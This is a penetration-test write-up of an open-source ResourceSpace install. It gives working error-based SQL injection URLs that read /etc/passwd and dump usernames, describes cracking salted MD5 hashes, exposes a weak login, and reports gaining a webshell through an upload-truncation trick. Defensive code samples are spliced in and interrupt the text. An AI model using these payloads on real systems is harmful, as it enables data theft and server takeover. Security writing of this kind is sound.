A process of successfully penetrating a website through vulnerability Mining

Source: Internet
Author: User

Background

One of our customers asked us to perform a penetration test on their websites to find weaknesses and help improve their security. After obtaining penetration test authorization from them, we began to analyze the sites.

Finding a breakthrough

The customer's main site is a custom-developed CMS. After a series of scans and analysis, no exploitable area was found, so we turned to its second-level domain names and found a resource-management substation. The target runs Linux with only HTTP (port 80) open, and the whole site runs ResourceSpace, an open-source PHP site-building program.

Vulnerability Mining

Because it is an open-source program, vulnerabilities are easier to find, so I decided to use this site as the breakthrough. I downloaded the latest source code from the ResourceSpace official site (http://www.resourcespace.org/), built a test environment locally and started a white-box code audit. Most ResourceSpace functions are only available after login, and the target site does not allow external user registration, so we needed vulnerabilities that can be exploited without passing login verification.

The first step was to look for vulnerabilities that are easy to use, such as SQL injection. After some grepping, we found this call in pages/search_disk_usage.php:

$results=do_search(getval("search",""),getvalescaped("restypes",""),"relevance",getval("archive",""),-1,"desc",false,$starsearch,false,true);

Let's look at the corresponding code in include/search_functions.php:

// $archive comes straight from getval("archive","") and is never escaped before use
if($sql_filter!="") {$sql_filter.=" and ";}
$sql_filter.="archive='$archive'";
}
return sql_query($sql_prefix . "select distinct *,r2.hit_count score from (select $select from resource r $sql_join where $sql_filter order by ref desc limit $last ) r2 order by $order_by" . $sql_suffix,false,$fetchrows);

A typical SQL injection vulnerability exists here: the archive parameter is concatenated directly into the query. In the local test environment, visit the following URL to test it:

http://192.168.1.172/ResourceSpace/pages/search_disk_usage.php?archive=a'

Return Value:

This proves that the injection point exists. However, this very long nested SQL query is still a little difficult to exploit; I tried for a long time to construct a statement that closes the surrounding clauses and did not find a proper method. Because the target's database is MySQL, we then tried the rand()/group by error-based method. The constructed statement is as follows:

http://192.168.1.172/ResourceSpace/pages/search_disk_usage.php?archive=a'%20and%20(SELECT%201%20FROM%20(select%20count(*),concat(floor(rand(0)*2),substring(load_file('/etc/passwd'),0,5))a%20from%20information_schema.tables%20group%20by%20a)b)%20and%20'1'='1

Indeed, the content of the passwd file was read back in the error message. This technique makes MySQL report an error by using a long-standing MySQL bug, and it is a common error-based SQL injection method; I will not go into its principle here. If you are interested, see http://bugs.mysql.com/bug.php?id=8652.

The next step is to get the administrator password and plant a webshell through the admin backend, so I tried the target website:
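To make the vulnerable pattern and its fix concrete, here is an added example (not ResourceSpace code) that rebuilds the query shape from do_search on an in-memory SQLite table: search_vulnerable splices archive into the WHERE clause as the page's code does, while search_hardened validates archive as a numeric state and binds it as a parameter. The table name, its columns (ref, archive, hit_count) and the sample rows are constructed for this example.

```python
import sqlite3

# Constructed stand-in for the ResourceSpace "resource" table; the columns
# (ref, archive, hit_count) and the rows are chosen for this example only.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE resource (ref INTEGER, archive INTEGER, hit_count INTEGER)")
    db.executemany("INSERT INTO resource VALUES (?, ?, ?)",
                   [(1, 0, 5), (2, 0, 9), (3, 1, 2)])
    return db

def search_vulnerable(db, archive):
    # Same shape as do_search: the raw archive value is spliced into $sql_filter,
    # so a single quote in it rewrites the query instead of being compared as data.
    sql_filter = f"archive='{archive}'"
    sql = ("SELECT DISTINCT *, r2.hit_count AS score FROM "
           f"(SELECT * FROM resource r WHERE {sql_filter} ORDER BY ref DESC LIMIT 1000) r2 "
           "ORDER BY score DESC")
    return db.execute(sql).fetchall()

def search_hardened(db, archive):
    # Two layers: archive is a numeric workflow state, so reject anything that is not
    # a plain non-negative integer, then bind it so the driver never parses it as SQL.
    if not isinstance(archive, str) or not archive.isdigit():
        raise ValueError("archive must be a non-negative integer")
    sql = ("SELECT DISTINCT *, r2.hit_count AS score FROM "
           "(SELECT * FROM resource r WHERE archive=? ORDER BY ref DESC LIMIT 1000) r2 "
           "ORDER BY score DESC")
    return db.execute(sql, (int(archive),)).fetchall()

def rejects(search, db, value):
    """True if the search refuses the value, either by validation (ValueError)
    or because the spliced SQL no longer parses (sqlite3.Error)."""
    try:
        search(db, value)
    except (ValueError, sqlite3.Error):
        return True
    return False

if __name__ == "__main__":
    db = make_db()
    print(search_vulnerable(db, "0"))            # normal use: both archive-0 rows
    print(rejects(search_vulnerable, db, "a'"))  # the page's archive=a' test breaks the SQL
    print(rejects(search_hardened, db, "a'"))    # rejected before any SQL is built
```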

http://rs.XXXX.com/ResourceSpace/pages/search_disk_usage.php?archive=a'%20and%20(SELECT%201%20FROM%20(select%20count(*),concat(floor(rand(0)*2),(SELECT%20username%20from%20user%20limit%200,1))a%20from%20information_schema.tables%20group%20by%20a)b)%20and%20'1'='1

Return Value:

Password cracking

Once the encrypted (hashed) password came back, the chance of success looked good. Because manual injection is too tedious, I wrote a program to dump all the accounts and password hashes of the target website.

The passwords look like MD5 hashes, but a further look at the source code shows that the situation is not optimistic: the value is an MD5 of the password with a salt and the user name prepended:

md5($salt . $username . $pass)

This means that the hashes cannot be looked up on sites such as iis5 or cracked with a rainbow table; brute force is the only option. Moreover, the default ResourceSpace password policy requires that passwords contain both letters and numbers, which makes cracking even less hopeful. So I wrote a cracking program:

We loaded our big dictionary and started running the passwords. We didn't have much hope, but you never know unless you try, and one user actually had a weak password.

Although it is not an admin account, a successful login already lets us do a lot. Our next goal is to get a webshell and then system privileges.
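The hashing scheme described above, as an added example that is not ResourceSpace's own code: legacy_hash reproduces md5($salt . $username . $pass) with a constructed salt value, which shows why two users with the same password get different digests (so rainbow tables fail) while each hash is still deterministic and fast (so dictionary brute force, as in this story, still works); login_and_upgrade is an assumed migration path that verifies the legacy hash at login and replaces it with a salted, slow PBKDF2 hash. The LEGACY_SALT value and the pbkdf2_sha256$ storage format are assumptions made for this example.

```python
import hashlib
import hmac
import os

LEGACY_SALT = "EXAMPLE_SALT"  # constructed stand-in for ResourceSpace's $salt value

def legacy_hash(username, password):
    # The scheme the page describes: md5($salt . $username . $pass).
    return hashlib.md5((LEGACY_SALT + username + password).encode()).hexdigest()

def verify_legacy(username, password, stored):
    return hmac.compare_digest(legacy_hash(username, password), stored)

def pbkdf2_hash(password, salt=None, rounds=200_000):
    # Per-user random salt keeps rainbow tables useless; each guess now costs
    # 200,000 HMAC iterations instead of a single MD5.
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, rounds)
    return f"pbkdf2_sha256${rounds}${salt.hex()}${dk.hex()}"

def verify_pbkdf2(password, stored):
    _algo, rounds, salt_hex, _dk = stored.split("$")
    recomputed = pbkdf2_hash(password, bytes.fromhex(salt_hex), int(rounds))
    return hmac.compare_digest(recomputed, stored)

def login_and_upgrade(username, password, stored):
    """Check the password against whichever format is stored. On a successful
    legacy match, return the upgraded hash so the caller replaces the MD5 record;
    otherwise return the stored value unchanged."""
    if stored.startswith("pbkdf2_sha256$"):
        return verify_pbkdf2(password, stored), stored
    if verify_legacy(username, password, stored):
        return True, pbkdf2_hash(password)
    return False, stored

if __name__ == "__main__":
    old = legacy_hash("alice", "Secret1234")
    print(old != legacy_hash("bob", "Secret1234"))   # same password, different digest
    print(login_and_upgrade("alice", "Secret1234", old))  # (True, 'pbkdf2_sha256$...')
```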

File Upload

Logging on to the target website as choib/qwer1234, we found a place where images can be uploaded, and PHP files can be uploaded through byte truncation of the file name. But there was a big problem: the uploaded file is renamed to a random file name, so we could not find our uploaded webshell. The penetration was deadlocked again.

Looking back at the ResourceSpace code, we found by analysis that the program can be forced into an error by submitting an abnormal request, and the error exposes the uploaded file name.

When you click to download an image, the image URL is not linked directly; instead, the request goes through

/ResourceSpace/pages/download_progress.php?ref=24&ext=php&k=&alternative=1&search=%21last1000&offset=0&archive=0&sort=DESC&order_by=relevance

We can modify this HTTP request in Burp to make the program report an error:

In this way the uploaded file is located and a webshell is obtained on the target system:

Postscript

After obtaining the shell, we did a lot more work, such as privilege escalation to root and intranet penetration, but we will not detail it here because it involves sensitive customer information. The purpose of this article is to present how the penetration breakthrough was achieved by finding and exploiting the ResourceSpace vulnerability.

Finally, as a responsible security vendor, we reported this vulnerability to the ResourceSpace official team, hoping to contribute to the security of open-source software.
